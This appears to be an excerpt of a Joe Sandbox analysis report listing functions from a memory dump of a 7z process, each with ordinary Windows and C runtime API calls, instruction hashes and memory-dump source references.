                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3267814326-0
                                                                                                                                                                                                • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                • Instruction ID: 1a8003d21bbc7c4489b321ced5390fe7f8c15e23b9e436227d2ff515ecaf021d
                                                                                                                                                                                                • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EF082A2350A5082E7109F24E8847996370E745FB5F144734DEBD4B7E5CF3C858AC354
                                                                                                                                                                                                Function 00942568 Relevance: 2.5, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                • Instruction ID: ea593dfefbe567d0565eaa92d2ec8a821060172f6e6c21afc6e64575a51cc62f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE0376225854051CA20EB21E45155A6760FBC97F4B842311B6BF576F9DE28C685CB00
                                                                                                                                                                                                Function 00942130 Relevance: 2.5, APIs: 2, Instructions: 11COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrowmalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2436765578-0
                                                                                                                                                                                                • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                • Instruction ID: 89b39cb3b2252c0b4de1a129defc06591c96ad04f8c4749d9cdb6399c52b2716
                                                                                                                                                                                                • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                • Instruction Fuzzy Hash: 79D01250B1B684D1DE08AB5498913145720A79D790FD06456F24B01726DE5CC18FC701
                                                                                                                                                                                                Function 0095251C Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                • Instruction ID: 91c227e13ef266f080eb92b56797ccc98a3089ec8882277ead0563058ed4fb97
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E514872248AC096CB62CF36D4402ED3B65F38AF99F694176DE9A4B719DF34C889C710
                                                                                                                                                                                                Function 009686E0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteString
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4236320881-0
                                                                                                                                                                                                • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                • Instruction ID: b4e9f36208a06b3c8f400e95c690e97935fe04394d88a491c023b086e4ea4561
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D11A51621878182E3708B19E54076B63A0E7847E4F649320EFDA577E4EF3CCE85D705
                                                                                                                                                                                                Function 00948C98 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00948A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00948E1D), ref: 00948A99
                                                                                                                                                                                                  • Part of subcall function 00948A60: GetLastError.KERNEL32(?,?,00000003,?,00948E1D), ref: 00948AA6
                                                                                                                                                                                                • SetEndOfFile.KERNELBASE ref: 00948CC7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$ErrorLastPointer
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 841452515-0
                                                                                                                                                                                                • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                • Instruction ID: 53cad61db4c9bff143f1eb40a0146506bda8cd9f2b280b5b3a5cdd97f45a5149
                                                                                                                                                                                                • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                • Instruction Fuzzy Hash: 47E02612301894C2E720ABA1A4D5A6F8314AB45BE1F489031EAC543B488E698CDA8710
                                                                                                                                                                                                Function 009464D4 Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00946464: FreeLibrary.KERNELBASE(?,?,?,009464E7), ref: 00946475
                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE ref: 009464F4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 534179979-0
                                                                                                                                                                                                • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                • Instruction ID: 6384ac75a798ecd59859c3ad936f705c6519114a9422fa88466b0e8aecf5b565
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BD02EA170072082EE142BAA6881B6803042F07BE0E88D030AE0903321DE280CEBA300
                                                                                                                                                                                                Function 00948BF0 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                • Instruction ID: 9fb9f72204dd9fb01ee4810318f030d49959c7219e2638f39290de5b994c9f9b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                • Instruction Fuzzy Hash: CDE04676328A40CBEB40CF60E404B4AB3A0F388B24F004114DE8A83B54DBBCC044CF40
                                                                                                                                                                                                Function 00946464 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,?,009464E7), ref: 00946475
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                • Instruction ID: 2106458cce38ff1e9c9f0187d734120ea79e38452deaf0feb62fb38ca99faee0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10D012E6702504C5FF154FA2E86473523586B59F94F5C5010CE154A350EF2D88958761
                                                                                                                                                                                                Function 00948AF4 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                • Instruction ID: 329baacaedbb1bb89aa123d2ec053945312b53e234d7da27845ded23554c34fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                • Instruction Fuzzy Hash: 59D01776618684C6E7008F60E05975AF764F388B64F484004EA8906768CBBCC199CB00
                                                                                                                                                                                                Function 009426A0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1795875747-0
                                                                                                                                                                                                • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                • Instruction ID: d7e5910bc246209bab6fb43c73f84be160588b13f20d9b438f7bedf180ee19c0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                • Instruction Fuzzy Hash: FCD0A9D2710B0882CE109B26E8103692321BB89BC8F089022DE9E0B318EE2CC2488B00
                                                                                                                                                                                                Function 0094794C Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                • Instruction ID: 35d56390a020d5d7752580abaeb147a5784ed6794ab1d390a702217e25002dc7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 09D01276B09D49C1DF312FFAD8407646366AB95FB4F285320CAB44A3E0EF2984D6C711
                                                                                                                                                                                                Function 00948BB0 Relevance: 1.5, APIs: 1, Instructions: 8timeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileTime
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1425588814-0
                                                                                                                                                                                                • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                • Instruction ID: 174ce17c697d2beb3999fa9b93a870704b824e1e26da643573e0c9da43726add
                                                                                                                                                                                                • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 73B09220B12400C2CB0C6722D8A631C13606789B21FE19429C50BD5650CD1CC5E94700
                                                                                                                                                                                                Function 00973D58 Relevance: 1.3, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00973E2A
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2114622545-0
                                                                                                                                                                                                • Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                • Instruction ID: c898dc4b843aa953d1f37e53db3f4d28d9d9866c16c127b45fd8fa2a93be8020
                                                                                                                                                                                                • Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                • Instruction Fuzzy Hash: B2319A33205B4186DB259F29E598769B3A9FB88FE0F58C5249B9E077A4EF38C955C300
                                                                                                                                                                                                Function 0096373C Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                • Instruction ID: 3fd4225c1053126f2c2634523db112bffe75d47cd46640866b4556ff74e8272b
                                                                                                                                                                                                • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                • Instruction Fuzzy Hash: A12128B370424097C724DB1AF840A5B7798F785BA4F249225FE5A47794EB78C942C780
                                                                                                                                                                                                Function 00969078 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memmove.MSVCRT(?,?,?,?,?,00969B61), ref: 0096911C
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrowmallocmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2847158419-0
                                                                                                                                                                                                • Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                • Instruction ID: 4a64149f743ae212882ce8a202b9419c940dd979b344231ff1e01d6b83338e17
                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                • Instruction Fuzzy Hash: 93218137205B4485EB11DF1AE814B2AB3A8F789FA8F698215EF6807394DF39C496C740
                                                                                                                                                                                                Function 0094C90C Relevance: 1.3, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                • Instruction ID: f82eedd3f44b84050690dc798b0b6bcca11fa6123ba9103596ae0791429c2e34
                                                                                                                                                                                                • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B115CE2717651BFCBB08B6CE450F387254F744780B648436DBCA87B10EB6ACC929301
                                                                                                                                                                                                Function 00973EE0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
